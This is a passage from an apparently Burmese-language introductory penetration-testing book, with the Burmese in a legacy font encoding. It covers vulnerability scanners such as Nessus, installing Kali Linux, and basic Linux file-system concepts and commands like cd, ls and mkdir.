tJvdk vkyfaqmifEdkifzdkYtwGufvnf; Social Engineering udk
toHk;jyKavh&Sdygw,f/ wdkufcdkifrIwpfck &mEIef;jynfh atmifjrifoGm;jyD qdk&ifawmh
attacker u olYtwGuf user account wpfck topfxyfzGifhwmrsdK;? root (admin)
password awGudk ajymif;vJypfwmrsdK;? data awGudk ul;,lwmrsdK;? malware awGudk
xnfhoGif;wmrsdK;? data awGeJY system udk zsufqD;ypfwmrsdK; ponfjzifh
olvkyfcsif&mudk vkyfEdkifcGifh &oGm;aprSmjzpfygw,f/
Pen-tester awGu tvm;wl enf;ynmawGudk toHk;jyKjyD; Vulnerability
(tm;enf;csuf) awGudk &SmazG&ovdk tm;enf;csufawGaMumifh xdcdkufvmEdkifr,fh
jzpfEdkifajcawGudkvnf; BudKwif rSef;qxm;&ygw,f/ Sensitive information (data)
awGudkvnf; xm;&SdoHk;pGJwJh ae&m rSef rrSef? vkyfydkifcGifh &olawG&JU todynmydkif;
tajctae pwmawGudk xnfhoGif; pOf;pm;&ygw,f/tm;enf;csufawGudk &SmazG
awGU&Sdygu xdktm;enf;csufawGudk z,fvdkY &u z,f? umuG,fvdkY &ygu umuG,fjyD;
umuG,fwm;qD;vdkY r&wJh tm;enf;csufrsdK; jzpfyguvnf; xdktm;enf;csufrS
wdkufcdkufvmvsif xdcdkufrI r&Sdatmif (enf;atmif) vkyfaqmif&r,fh
enf;vrf;awGudkyg &SmazG &rSmjzpfygw,f/
rdrdwdkY wm0ef,l vkyfaqmifay;aewJh company (or) organization awGrSm
vuf&Sd vkyfudkifaeol 0efxrf;rsm; (txl;ojzifh uGefysLwmrsm;ESifh xdawGYae&olrsm;)
udk oufqdkif&m todynmay;jcif;rsdK;awG vkyfaqmif&rSmvnf; jzpfygw,f/
ck uRsefawmfwdkY aqG;aEG;cJhwmav;awGu Penetration Testing eJY
oufqdkiforQ Concept awG tm;vHk; r[kwfyg/ oabmobm0udk em;vnf&Hkom
tusOf;csKyf aqG;aEG;jcif;jzpfwmrdkY 'Dae&mrSmyJ acwÅcP &yfem;&atmifyg/
CHAPTER 3: Vulnerability Assessment

Chapter 2 rSm tenf;i,f aqG;aEG;cJhwJh vulnerability assessment ygyJ/

vulnerability analysis vdkYvnf; ac:ygw,f/ system odkYr[kwf network
infrastructure xJrSm &SdaewJh tm;enf;csufawGudk &SmazGazmfxkwf&wmjzpfjyD;
xdktm;enf;csufawGaMumifh jzpfay:vmEdkifr,fh xdcdkufrIyrmPawG jzpfEdkifajceJY
oufa&mufrItvdkuf cGJjcm;rSwfwrf;jyK&wmjzpfygw,f/
vulnerability awGu wdkufcdkufcH&r,fh wHcg;aygufawGjzpfygw,f/ ydkjyD;
em;vnfatmif ajym&&if system (or) network wpfck xdef;csKyfcH&jyDqdk&if
aocsmwmu xdk system xJrSm Bug (or) Weakness &SdaevdkYygyJ/ vulnerability
assessment u xdk bug (or) weakness awGudk &SmazG azmfxkwfjyD; tajz&Sm
Solution Patch awG xkwfjyD; xdkpepfudk xdef;csKyfcH&jcif; or xdk;azmuf0ifa&muf
cH&jcif;rS umuG,fEdkifapzdkY &nf&G,f vkyfaqmif&wmjzpfygw,f/
xkdodkY vkyfaqmif&mrSm vlom;awGryg0ifbJ vkyfaqmiEdkifwJh automated
tool awGudk toHk;rjyKoifhygbl;/ bmvdkYvJqdkawmh xdk tool awG[m frame wpfck
twGif;rSm &SdaewmaMumifh &vmr,fh result awG[m rSm;,Gif;aeEdkifvdkYygyJ/
uRrf;usifjyD; tawGUtBuHKrsm;wJh Professional Pen-tester awGuawmh
Vulnerability Assessment Report udk MunfhjyD; manual method awGeJYyJ
qHk;jzwfavh &SdMuygw,f/ qdkvdkwmuawmh Vulnerability awG &SmazGwJhtcg
Scanning Tool awGudk toHk;jyK&ifawmifrS Vulnerability udk qHk;jzwfwJhae&mrSm
udk,fydkifqHk;jzwfcsufeJYom vkyfaqmifwmrsdK;yg/
xdkodkY Scan jyKvkyfEdkifr,fh tool awGudk toHk;jyKjyD; uRsefawmfwdkY&JU
pepfawGxJrSm tm;enf;csufawG &Sd r&Sd ppfaq;aqmif&GufEdkifygw,f/ xdk Tool
awGxJrSm GUI tool awGvnf; &SdaewmaMumifh vG,fultqifajypGm vkyfaqmifvdkY&
wmrdkY trsm;pk toHk;jyKEdkifr,fh tm;omcsufawGvnf; &Sdaeygao;w,f/
Vulnerability awGeJY ywfoufjyD; National Vulnerability Database (NVD)
rSmvnf; Security checklists, security related software flaws,
misconfigurations, product names eJY impact metrics awGudk azmfjyay;xm;wmudk
nvd.nist.gov rSm oGm;a&muf avhvmEdkifygw,f/
update jzpfjyD; aumif;rGefwJh CIS control awGudk &,lvdkygu
www.cisecurity.org/controls rSm oGm;a&muf &,lEdkifygw,f/ Vulnerability
aygif;rsm;pGmudk azmfjyxm;wJh Secunia Historic Advisor udk avhvmvdkygu
bit.ly/secunia-adv rSm oGm;a&mufavhvmEdkifjyD; Free Security Software udk
&,lvdkygu bit.ly/secunia rSm oGm;a&muf &,lEdkifygw,f/
 ckawmh Vulnerability Scanner awG taMumif;udk quf&atmifyg/
Powerful detection, scanning and auditing features awGudk toHk;jyKxm;wJh
Nessus scanner [m urÇmrSm twGifus,fqHk; toHk;jyKaeMuwJh Vulnerability
scanner wpfckjzpfjyD; extensive management & collaboration function awGvnf;
yg0ifygw,f/ One Laptop twGuf Nessus Professional eJY Mulltiple
vkyfaqmifEdkifwJh Nessus Manager qdkjyD; Version ESpfrsdK; xkwfxm;ovdk
tprf;oHk;umv 2v (&uf 60) ay;xm;wmaMumifh oHk;&wm tqifajyaprSm
taotcsmygyJ/ aemufqHk; Am;&Sif;awGudk &,l toHk;jyKcsif&ifawmh
bit.ly/nessus-aio uae a'gif;,lEdkifygw,f/

Vulnerability awGudk &SmazGazmfjyay;Edkifovdk ajz&Sif;EdkifzdkYyg

ulnDay;Edkifjcif;u Nessus udk Security Auditor awG oHk;pGJaejcif;&JU
t"dutaMumif; jzpfEdkifygw,f/ xyfrH jznfhoGif;vdkY &wJh Plug-in awGuvnf;
Nessus udk ydkrdkaumif;oxufaumif;atmif vkyfaqmifay;EdkifwmaMumifh
uRsefawmfwdkYtaeeJY Nessus udk toHk;jyKjcif;u aumif;rGefwJh a&G;cs,frI jzpfaprSm
taotcsmygyJ/ uRefawmfwdkY&JU vuf&Sd company (or) Organization awGrSm
toHk;jyKwJh windows computer awGonf License Version xuf Pirate Version
(Cracked Version) awGu ydkrsm;aejcif; Update vkkyfavhr&Sdjcif; eJY patch awG
toHk;jyKrI tm;enf;jcif;wdkYaMumifh Vulnerability awG odyfrsm;aewmudk
awGY&ygvdrfhr,f/
uRefawmfwdkYtaeeJY 'DtcuftcJawGudk tvG,fwulajz&Sif;EdkifzdkYtwGuf
Nessus udk toHk;jyKjcif;u vG,fuloufomygvdrfhr,f/ Security Auditor tjzpf
vkyfaqmifvdkolawGtaeeJYvnf; Nessus Manager udk 0,f,ltoHk;jyKjcif;jzifh
vkyfief;rsm; vkyfaqmif&mrSm tqifajyacsmarGUaprSmjzpfygw,f/
IBM Security AppScan uvnf; Web application eJY Mobile application
security awGudk aumif;pGm xdef;odrf;ay;EdkifaMumif; awGY&ygw,f/ 'ghjyif Windows,
Mac OS X eJY Linux platform awGrSm toHk;jyKvdkY &wJh LanGuard vdk application
udk toHk;jyKjyD; Vulnerability &SmazGjcif;eJY tvdktavsmuf patching
vkyfay;jcif;awGudk vkyfaqmifEdkifygao;w,f/ Microsoft Baseline Security
Analyzer (MBSA) uvnf; vdktyfaewJh security update awGudk
vkyfaqmifay;EdkifwmaMumifh rdrdwdkY&JU Windows system awGudk ydkrdk vHkjcHKatmif
vkyfaqmifay;EdkifrSmjzpfygw,f/
ck uRseffawmf aqG;aEG;cJhwmawGu toHk;jyKvdkY &wJh Tool awGudk
tMurf;zsif; aqG;aEG;jcif;omjzpfjyD; Google rSm tvG,fwul &SmazG,lEdkifygw,f/
prf;oyfvkyfaqmifMunfhvdkolrsm;vnf; prf;oHk;MunfhEdkifygw,f/ tvG,fwul
toHk;jyKvdkY&atmif pDpOfxm;wJh tool awGrdkY wpfckpDudkawmh tao;pdwf
razmfjyawmhyg/ rdrdwdkY uGefysLwmawGtwGufvdktyfwJh patch awGudk tvG,fqHk;
Patching jyKvkyfvdkygu HFNetChk udk toHk;jyKEdkifygw,f/
www.petri.com/hfnetchk rSm Download &,lEdkifygw,fcifAsm/
CHAPTER 4: Kali Linux Installation

Introduction

Kali Linux qdkwm uRefawmfwdkYawG toHk;jyKMur,fh Hacking OS vdkY

tvG,f rSwfom;Edkifygw,f/ Linux taMumif; aemufwpfcef;rSm
azmfjyay;oGm;rSmyg/ ckawmh b,fvdk &,l&r,f/ b,fvdk install &r,f qdkwmawGudk
aqG;aEG;ay;oGm;ygr,f/
'Dae&mrSm jznfhpGuftaeeJY azmfjycsifwmav; wpfck &Sdygw,f/ tJ'gu
bmvJqdkawmh uRefawmfwdkYrSm pdk;&drfrIav;wpfck &SdwwfMuvdkYyg/ uRefawmfh
uGefysLwmrSm Linux oHk;vdkY &yghrvm;qdkwJh ar;cGef;aygif;rsm;pGmudk uRefawmf BuHKzl;
ygw,f/ tJonftwGufawmh rpdk;&drfygeJY vdkYyJ ajzyg&ap/ Kali Linux udk oHk;jyD;
Hacking avhvmcsifw,f/ uGefysLwmu memory enf;w,f tqifajyyghrvm;vdkY
pdk;&drfwwfolawG &Sdygao;w,f/ tJonftwGuf tenf;i,f azmfjyay;csifygw,f/

Kali Linux wifoHk;csifw,fqdk&ifawmh Kali &JU Official Page rSm

azmfjyxm;wmu HDD space 20GB tenf;qHk; vdktyfygr,f/ (uRefawmfhtaeeJY
jznfhpGufaqG;aEG;&&ifawmh 80GB avmuf tenf;qHk; &Sdoifhygw,f/ 'grS
prf;oyfcsufawGudk vkyfaqmifEdkifzdkYtwGuf virtual lab awG wnfaqmufzdkY tqif
ajyygr,f/) aemufwpfcsufu Kali Official rSm azmfjyxm;wmu tenf;qHk; RAM
onf 1GB &Sd&r,f/ 2GB &Sd&ifawmh ydkaumif;w,f vdkY azmfjyxm; ygw,f/ 'Dae&m
rSmvnf; tenf;i,f xyfaqG;aEG;vdkwmav; &Sdygao;w,f/ RAM 2GB avmuf
&Sdxm;oifhygw,f/ RAM 2GB qdk Kali 32 bit om wifoifhjyD; RAM 4GB uae
txufrS Kali 64bit udk toHk;jyKoifhygw,f/
Windows udk rjzpfrae oHk;ae&w,f/ Kali rwifbJ oHk;vdkY r&bl;vm;
vdkY ar;wJholawGvnf; BuHKzl;ygw,f/ uRefawmfwdkY uGefysLwm tajctaeay:
rlwnfjyD; Kali Linux udk wifenf;av;awG &Sdygw,f/ 1. Kali Linux Only
wifjcif;? 2. Windows & Kali Linux Dual Boot wifjcif;? 3. Virtual Machine
tjzpf wifjcif; eJY 4. USB Live Mode tjzpf toHk;jyKjcif; qdkjyD; &Sdygw,f/
Making Kali Linux Latest Installer Disc
Kali Linux udk rwifrD uRefawmfwdkYtaeeJY Kali Linux &JU iso image
file udk a'gif;,lxm;zdkY vdktyfygw,f/ a'gif;,lEdkifzdkYtwGufawmh Browser rSm
bit.ly/kalidown vdkY &dkufxnfhvdkuf&HkygyJ/ aemufqHk; Am;&Sif;udk awGYjrif&ygr,f/

txufygtwdkif;Z,m;uGufrSm tay:qHk; ESpfck 64bit eJY 32bit xJu rdrd

uGefysLwmeJY tqifajyr,fh wpfckudk a&G;cs,f a'gif;,lyg/ eHab;u tjyma&mifeJY
ay:vmr,fh HTTP qdkwmav;udk ESdyfvdkufwmeJY a'gif;jyD jzpfygw,f/ Virtual
Machine tjzpf Install r,fh olawGuawmh acGvkyf&ef rvdktyfyg/ a'gif;jyD;vsif
&ygjyD/
acGvkyfzdkYtwGuf vdktyfwJh app wpfck &Sdygao;w,f/ PowerISO yg/
bit.ly/poweriso vdkY Browser rSm &dkufxnfh Enter vdkufyg/

txufygtwdkif; jrif&rSmjzpfjyD; rdrdwdkY Windows eJY udkufnDr,fh bit udk

a&G;cs,f a'gif;,ljyD; Install xm;&ygr,f/
 Download ,lxm;wJh Kali iso zdkifudk Right-click ESdyfjyD; Open with >>
PowerISO eJY a&G;zGifhyg/ txufygtwdkif; ay:vmygr,f/ DVD acGvGwf
wpfcsyfudk pufxJ xnfhyg/ jyD;&if PowerISO uae Burn qdkwJh yHkav;udk ESdyfyg/

txufygtwdkif; aemufwpfqifh ay:vm&if Burn udk ESdyfjyD; 100%

jynfhvdkY acG olYbmom xGufvmwJhtxd apmifhay;&ygr,f/ 'gqdk&ifawmh Kali
Linux Installer Disc wpfckudk zefwD;EdkifygjyD/

Kali Linux Installation

Kali Installer Disc/USB udk uGefysLwmrSm xnfhoGif;^wyfqifjyD; yg0g

zGifhum Boot ac:wifvdkuf&ifawmh txufygtwdkif; Kali Linux Boot Menu udk
awGY&rSm jzpfygw,f/ Live Mode oHk;olawGtwGufuawmh Live qdkwJh
tay:qHk;twef;udk a&G;jyD; enter vdkuf&HkeJY cPapmifhjyD; Kali Linux udk oHk;EdkifrSm
jzpfygw,f/ (acGeJY oHk;olawGuawmh Live Mode oHk;wJhtcg bmrS 'DwpfBudrf
xnfhoGif;xm;orQ aemufwpfBudrfjyefoHk;&if r&Sdawmhygbl;/ topfjyefjzpfoGm;
rSmyg/ Live Mode USB eJY oHk;vsif ydkjyD; tqifajyygw,f/) ckuawmh Install
vkyfrSm jzpfvdkY Graphical Install udk a&G;jyD; enter &ygr,f/ a&G;wJhtcg Keyboard
uae tay:atmuf jrm;av;awGudk oHk;jyD; a&G;cs,fEdkifygw,f/ uJ a&G;cs,fjyD;jyD
qdkygpdkY/
 aemufwpfqifhu bmompum; a&G;cs,f&rSmyg/ tqifajyqHk; English
twdkif;yJ xm;jyD; Enter (or) Continue ESdyfEdkifygw,f/

Location a&G;wJh aemufwpfqifhrSmvnf; ra&G;bJ Enter (or) Continue

yJ ESdyfvdkufygw,f/

'Dtqifhu Keyboard a&G;cs,fcdkif;wJh tqifhyg/ bmrSrvkyfbJ Continue

vdkufyg/

'Dtqifha&mufvmjyDqdk&ifawmh uRefawmfwdkYrSm wifi connection

av;wpfck vdkygw,f/ zkef;uae wifi hotspot vkdufyg/ (tifwmeuf rzGifhvnf;
&ygw,f)/
jyD;awmh wlan0 udk a&G;cs,fjyD; uRefawmfwdkY zkef;uae vTifhxm;wJh vdkif;udk
a&G;cs,f csdwfqufyg/ jyD;&if wifi Password ay;xm;&if wifi password udk
a&G;cs,f xnfhjyD; continue eJY a&SUqufEdkifygw,f/
 'Dtqifhuawmh Kali Linux twGuf root Password xnfhoGif;&r,fh
ae&myg/ tuGuf ESpfuGufvHk;rSm wlnDwJh password udk xnfhoGif;&ygr,f/ Oyrm
apple aygh/ yxrwpfuGuf apple qdk aemufwpfuGufvnf; apple yJ xnfh&ygr,f/
raocsm&if atmufu Show Password in Clear qdkwJh tuGufuav;udk ESdyfjyD;
azmfMunfhEdkifygw,f/
 aemufwpfqifh Clock Configure vkyfcdkif;&ifvnf; bmrS ra&G;bJom
a&SUqufvdkufyg/

Kali Linux wpfckvHk; wifr,fholawG&,f? Virtual Machine tjzpf

wifolawG&,fuawmh cktwdkif; Continue vdkuf&HkygyJ/ Windows eJY Dual
wifvdkwJholawGuawmh Manual udk a&G;jyD; Partition awGudk jyifqif&ygOD;r,f/
Dual Boot wifr,fholawGuawmh root, swap, boot, home qdkwJh Partition
av;uefY ydkif;&zdkY vdktyfjyD; Hacking udk xJxJ0if0if avhvmcsifw,f/ RAM
uvnf; 4GB uae txuf &Sdw,f/ HDD space udkvnf; Kali twGuf 150GB
avmuf ay;Edkifw,f qdkrSom Dual wifzdkY qHk;jzwfoifhygw,f/
jyD;&if Continue &rSmyg/ Partition awG ydkif;xm;wJhtwdkif; Format
vkyfrvm;vdkY ar;wJhtqifhrSm Yes udk a&G;jyD; quf Enter &ygr,f/

Kali udk pwif Install aejyD jzpfygw,f/

 txufygtwdkif; Network Mirror oHk;rvm; ar;&if No yJ ajzyg/

txufygtwdkif; Package Manager configure rSm bmrS rxnfhbJ

continue vdkufyg/

GRUB wifrvm; ar;vmygr,f/ rjzpfrae Yes a&G;ay;yg/

GRUB twGuf ae&m a&G;cdkif;wmyg/ yHkygtwdkif; 'kwd,aMumif;udk a&G;

vdkufyg/
 Installation Complete ygjyD/ acGjyefxGufvmygr,f/ jyefrxnfhygeJY/
Continue vdkufyg/ aemufqHk; tqifhjyD;qHk;oGm;jyD; Restart jzpfvmygr,f/
jyefyGifhvmwJhtcg Kali Linux udk toHk;jyKvdkY &jyD jzpfygw,f/

Making Kali Live Mode USB

Kali Linux udk USB stick wpfacsmif;xJrSm xnfho,foGm;csifol
awGtwGufyg/ tjcm;uGefysLwmawGuaevnf; wyfjyD; oHk;vdkY&wmaygh/ yxrqHk;
taeeJY Kali Linux iso udk a'gif;,lyg/ tay:qHk;rSm ajymxm;jyD;om;rdkY xyfrazmfjy
awmhygbl;aemf/ jyD;&ifawmh bit.ly/win32-kmn uae Win32diskImager udk
a'gif;,ljyD; Windows rSm Install vdkufyg/

Finish jzpfoGm;wJhtcg Live Mode USB stick &ygjyD/ toHk;jyKEdkifjyDaygh/

rSwfcsuf/ / ,cktcef;yg Kali Linux wifenf;? acGvkyfenf;? Windows & Kali

Dual Boot wifenf;? Virtual Box rSm wifoHk;enf; pwmawGudk
bit.ly/kali-aio rSm AD'D,dkzdkifav;awGeJY wpfckpD azmfjyay;xm;yg
ao;w,f/ 0ifa&mufMunfh&IEdkifygw,fcifAsm/
CHAPTER 5: Linux Fundamental

1. Introduction to Linux

Linux qdkwmudk roHk;zl;&ifawmif Linux qdkwJhpum;vHk;udkawmh

uRsefawmfwdkY Mum;odzl;Muygw,f/ Operation System wpfckvHk;udk &nf&G,fjyD;
uRefawmfwdkY ac:avh&SdwJh Linux qdkwm wu,fawmh BIOS/UEFI eJY Boot Loader
uae pwifwJh Operation System Kernel wpfckjzpfygw,f/
Linux udk 1991 ckESpfrSm Finish student wpfa,mufjzpfwJh Linus
Torvalds u pwifcJhwmjzpfjyD; olU&JU &nf&G,fcsufuawmh Free OS kernel wpfckudk
zefwD;ay;vdkwJh &nf&G,fcsufeJY pwifcJhwmjzpfygw,f/ Linux ay:aygufvmyHkudk
tusOf;csKyf aqG;aEG;cJhwmjzpfygw,f/ ordkif;aMumif;udk razmfvdkawmhygbl;/
a&;xm;wJh pmayawGvnf; trsm;BuD;&SdvdkY jzpfygw,f/
GNU taMumif;av; qufvdkuf&atmif/ GNU qdkwmu Unix udk
qdkvdkwm r[kwfygbl;/ trSwfrSm;Edkifwmav;awG&SdvdkY xnfhajymjcif;yg/ GNU u
Unix r[kwfayr,fh Unix-like Operating system wpfrsdK;jzpfjyD; 1984 ckESpfrSm
launch vkyfcJhwmjzpfygw,f/ Free Software wpfrsdK;jzpfjyD; Kernel
yg0ifjcif;r&Sdygbl;/ tMurf;zsif;ajym&&if GNU qdkwmu Application awG?
Library awGeJY developer tool awG pwmawGudk aygif;pkxm;wJh software
collection wpfrsdK;om jzpfygw,f/ OS wpfck[m resource awGqDudk allocate
jyKvkyfzdkYeJY hardware awGudk ajymjyEdkifzdkYtwGuf tjcm; program wpfck
vdktyfygw,f/ tJonf program uawmh kernel ygyJ/
Kernel rygcJhwJh GNU [m Linux udk olY&JU Kernel tjzpf
toHk;jyKxm;ygw,f/ 'gaMumifh GNU/Linux vdkY ac:qdkMuwm jzpfygw,f/ uJ
uRefawmfwdkYrSm Linux qdkwJh Kernel eJY GNU qdkwJh Operating System &SdaejyD
qdkMuygpdkY/ uRsefawmfwdkYu ck tvG,fqHk;ac:aeMuwm Linux qdkayr,fh wu,fu
GNU/Linux jzpfjyD; toHk;jyKol oef;aygif;rsm;pGm &SdaejyDjzpfygw,f/ GNU rSmvnf;
the Hurd vdkY ac:wJh udk,fydkif Kernel wpfck&SdjyD; ,aeYcsdefxdtoHk;jyKrI
rwGifus,fao;yg/ yGJOD;xGufyif rawGYzl;ao;yg/ quf&atmifaemf/
'DpmtkyfxJrSmawmh Linux Distro awG trsm;BuD;xJurS Kali Linux udk
t"duxm;jyD; toHk;jyKaqG;aEG;oGm;rSmjzpfw,fqdkwmav; xyfrHajymMum;yg&ap/
Kali Linux udk install jyKvkyfvdkygu vma&muf aqG;aEG;EdkifwJhtaMumif; a&SUrSm
azmfjycJhjyD;jyDaemf/ rdrdwdkYtaeeJY avhvmvkyfaqmifMunfhcsifyguvnf; rdrdwdkY
toHk;jyKr,fh Browser &JU address bar rSm bit.ly/kali-aio vkdY &dkufxnfhvdkuf&HkeJY
Kali Linux udk &,lyHk? Install jyKvkyfenf;trsdK;rsdK;ESifh tjcm;aom
odrSwfzG,f&mrsm;udk avhvmEdkifygao;w,f/
Kali Linux udk Install jyD;jyDvdkYyJ oabmxm;&atmif/ Linux eJY
ywfoufwJh tajccH odoifhodxdkufwmav;awGudk 'Dae&mrSm qufvuf
aqG;aEG;oGm;rSmjzpfygw,f/

2. Unifying File System

'Dwpfcgawmh Linux File System taMumif; tenf;i,f aqG;aEG;ygr,f/

File System onf Kernel &JU ta&;ygwJh wpfpdwfwpfa'o vdkY qdk&ygr,f/
Unix-like Operating System awGrSm zdkifodkavSmifrIawGudk Single Hierarchy rSmyJ
pkpnf;csdwfqufxm;ygw,f/ Hierarchy qdkwmuawmh ta&;ygrItvdkuf
pkpnf;pkzGJYxm;wJh tpktaygif; (odkYr[kwf) ta&;ygrItvdkuf pDpOfxm;wJh tpDtpOf
vdkY qdkEdkifygw,f/
Hierarchical tree &JU starting point udkawmh root vdkY ac:jyD;
oauFwtaeeJY ]rsOf;apmif;} ]] ^ }} udk toHk;jyKygw,f/ "root" directory xJrSm
sub-directories (directory cGJ) rsm;pGm yg0ifygw,f/ Oyrm root qdkwJh directory
xJu home qdkwJh directory udk oauFweJY azmfjy&if /root/home ujzpfygw,f/
directory qdkwJhpum;vHk;eJY pdrf;ae&ifawmh windows rSm ac:avh&SdwJh Folder vdkYyJ
tvG,fqHk; rSwfxm;Edkifygw,f/ (directory vdkY ajym&if folder aygh)
'gqdk /home/new/abc.txt vdkY ajym&if root(system) xJ home qdkwJh
directory (folder) xJrSm&SdwJh new qdkwJh directory xJu abc emrnfeJY txt
zdkifwpfckvdkY em;vnfavmufjyDxifygw,f/ Disk awGay:rSm &SdaewJh storage
location eJY Naming System ESpfckMum;rSm translate vkyfay;wmuawmh Kernel yg/
Disk awGay:rSm a'wmawGudk odkavSmifzdkYtwGuf toHk;jyKEdkifwJh Format
awG rsm;pGm &SdMuygw,f/ Linux twGuf t"duuswmawGuawmh ext2, ext3 &
ext4 wdkY jzpfMuygw,f/ 'ghjyif Windows wifxm;wJhbufuae Linux &JU ext4
wdkYvdk file system awGxJudk 0ifa&mufzwfEdkifzdkY rvG,fayr,fh Linux
toHk;jyKxm;wJhbufuae Windows &JU NTFS, FAT & FAT32, etc... pwJh file
system awGudk zwf&Iod&SdEdkifwmuvnf; Linux oHk;olawGtwGuf
tm;omcsufwpf&yf jzpfaeygao;w,f/ vG,fvG,fajym&&if Linux bufu
zdkifawGudk windows bufuae odEdkifzdkY rvG,fayr,fh Linux bufrSmawmh
rnfonfh File System udkrqdk odEdkifw,fvdkY qdkvdkwmygyJ/
3. The Command Line

uRefawmfwdkY toHk;jyKawmhr,fh Linux System rSm ta&;ygqHk;vdkY

qdkvdkY&r,fh Command Line udk toHk;jyKvdkygu Kali Linux wifjyD;wJhtwdkif;
xm;&Sd&if vuf0Jbuf (b,f) rSm axmifvdkuftaeeJY Menu bar wef;uav;
&Sdaewmudk awGY&ygr,f/ Windows rSmqdk&ifawmh 'gudk Task Bar vdkY ac:ygw,f/
Linux rSmawmh olYudk Dash to Dock vdkY ac:qdkygw,f/ tJonfuaevnf;
oGm;a&muf zGifhMunfhEdkifygw,f/

icon uawmh txufyg yHktwdkif; jzpfygw,f/ vkyfaqmifp&m

tawmfrsm;rsm;udk GUI taeeJY vkyfaqmifvdkY &aeayr,fh Terminal udk
toHk;jyKjcif;udk uRrf;usifydkifEdkifzdkYvnf; vdktyfvSygao;w,f/ Linux toHk;jyKrI
uRrf;usifvmwJhtcg Terminal &JU ta&;ygrIawGudk ydkrdk em;vnfvmygvdrfhr,f/
 Terminal udk zGifhMunfhwJhtcg txufyg yHktwdkif; jrifawGY&ygr,f/
txufyg yHkrSm Munfhr,fqdk&ifawmh root@kali vdkY awGY&rSmjzpfygw,f/ olU&JU
yHkpHu account@host-name jzpfwmrdkY a&SUrSmawGY&wJh root onf vuf&Sd
0ifa&mufaewJh Acc udk azmfjyygw,f/ @ aemufu kali uawmh Kali Linux udk
wifwJhtcgwkef;u host name ae&mrSm xnfhcJhwJhtwdkif; ay:jcif;jzpfjyD; setting
uae jyefvnf ajymif;vJtoHk;jyKvdkYvnf; &ygw,f/ aemufrSm ygwJh # oauFw
uawmh vuf&Sd toHk;jyKaewJh terminal onf root terminal jzpfvdkY jzpfygw,f/
root account ur[kwfbJ tjcm; user account uae 0ifa&muf toHk;jyK&ifawmh #
ae&mrSm $ oauFw udkom jrifawGY&rSmjzpfygw,f/
uRefawmfwdkY taeeJY Terminal vnf; odjyD/ root Vs other account awG
&JU terminal oauFw rwlnDwmvnf; odjyD? pmtkyfxJrSm (root@kali) vdkY awGY&if
'gawGu &dkufxnfhp&mrvdkbl; &SdjyD;om;qdkwmvnf; em;vnfjyDqdk&ifawmh 'Dwpfcg
Terminal Commands awGtaMumif; tenf;i,f qufvuf
aqG;aEG;&atmifcifAs/
Terminal command awGxJrS toHk;rsm;wJh a,bk,s command awGudk
azmfjy aqG;aEG;oGm;ygr,f/
cd command udk directory awGxJudk 0ifa&mufzdkY oHk;ygw,f/ linux
roHk;zl;olawGtwGuf tvG,fqHk; em;vnfatmif ajym&&if folder awGxJudk
0ifa&mufEdkifzdkYtwGuf toHk;jyKygw,f/ Oyrm- cd Downloads vdkY
&dkufxnfhvdkuf&if Downloads qdkwJh directory (folder) xJudk 0ifa&mufwm
jzpfygw,f/ wpfck owdxm;zdkYu Linux rSm Windows vdk pmvHk;tBuD;tao;
tqifajyovdk &dkufvdkY r&ygbl;/ Upper (or) Lower (pmvHk;tBuD;tao;)
rSefuefatmif &dkuf&ygw,f/
cd udk prf;oyfMunfhEdkifzdkYtwGuf terminal udkzGifhvdkuf&atmif/ jyD;&if
vuf&Sd a&muf&SdaewJh Directory xJrSm bmawG&SdvJqdkwmudk odEdkifzdkY ls (LS
tao;csnf;) &dkufxnfhjyD; enter vdkufyg/

txufyg yHkuawmh uRsefawmfh&JU root accc, Home directory xJrSm

&SdaewJh zdkifawG directory awGyg/ directory awGudk tjyma&mifeJY azmfjyygw,f/
tjcm;aom zdkifawGudkvnf; ta&mifcGJjcm; azmfjyxm;wm jrifawGY&rSmyg/
tjyma&mifeJY azmfjyxm;wJh directory awGudk Munfhr,fqdk&if vuf&Sd Home
directory xJrSm yg0ifwJh directory awGudk od&SdEdkifygw,f/ (folder xJrSm&SdwJh folder
awGaygh)
ck Desktop qdkwJh directory xJudk 0ifMunfh&atmif/

txufygtwdkif; 0ifMunfhvdkufwJhtcg bash: cd: desktop: No such file

or directory qdkjyD; jyvmwmudk awGY&ygvdrfhr,f/ taMumif;uawmh uRefawmf
&dkufxnfhvdkufwJh cd desktop rSm d u pmvHk; tao; jzpfaevdkYyg/ tay:yHkrSm
jyefMunfh&if Desktop rSm D udk tBuD;pmvHk;eJY a&;xm;wmudk awGYjrif&ygr,f/
pmvHk;tBuD;eJY jyefajymif;a&;Munfh&atmif/

ckqdk&ifawmh uRefawmfwdkY Desktop udk 0ifa&mufEdkifjyDjzpfygw,f/

Desktop ay:rSm zdkifawG&Sdygu MunfhEdkifzdkYtwGuf file list azmfwJh ls comand
av;udk toHk;jyKjyD; MunfhEdkifygw,f/

uRefawmfh&JU Desktop ay:rSmawmh folder wpfckom &SdvdkY wpfckom

jyay;wmyg/ bmrS r&Sd&ifawmh bmudkrSs jyay;rSmr[kwfyg/
Desktop ay:rSm &Sdaewkef; New Folder wnfaqmufyHkudk qufvuf
avhvm&atmif/ folder ukd directory vdkY ac:w,fqdkwm ajymjyjyD;jyDaemf/ 'Dawmh
folder topf jyKvkyfr,fqdkawmh make folder (make directory) aygh/
tJonftwGuf command u mkdir yg/ mkdir directory-name aygh/ Oyrm-
vuf&Sd dir xJrSm test qdkwJhemrnfeJY dir wpfck zefwD;vdkwJhtcg mkdir test qdkjyD;
&dkufxnfh&rSmyg/

txufygtwdkif; &dkufxnfhjyD;ygu ls eJY list jyefazmfMunfh&if test qdkwJh

directory wpfck xyfwdk;aewmudk jrif&ygr,f/
 txufyg yHkrSm test qdkwJh dir wpfck xyfwdk;vmwmudk awGY&rSmyg/ cd udk
oHk;jyD; xyf0ifvdkuf&atmif/ cd test eJY 0ifa&mufvdkufwJhtcg test folder xJudk
0ifa&mufjyD; jzpfwm awGY&ygr,f/

'Dcgawmh space jcm;wJh emrnfeJY folder wpfckudk zefwD;Munfh&atmif/

test two qdkwJhemrnfeJY folder wpfckudk wnfaqmufMunfhMupdkY/

txufyg yHkt& Desktop ay:u test directory xJrSm test two qdkwJh
emrnfeJY folder wpfck wnfaqmufwmjzpfygw,f/ 'gayr,fh ckcsdefrSm Desktop
ay:rSm&SdwJh test folder udk zGifhMunfhr,fqdk&ifawmh

uRefawmfwdkY awGY&rSmu test eJY two qdkwJh folder ESpfck jzpfaewmyg/

vdkcsifwmu test two qdkwJh folder wpfckwnf;// &vmwmu ESpfck/
bmaMumifhvJqdkawmh name rSm ygaewJh space aMumifhygyJ/ command line rSm
space jcm;vdkufwmeJY oD;jcm;wpfcktjzpf owfrSwfygw,f/ 'gaMumifh command
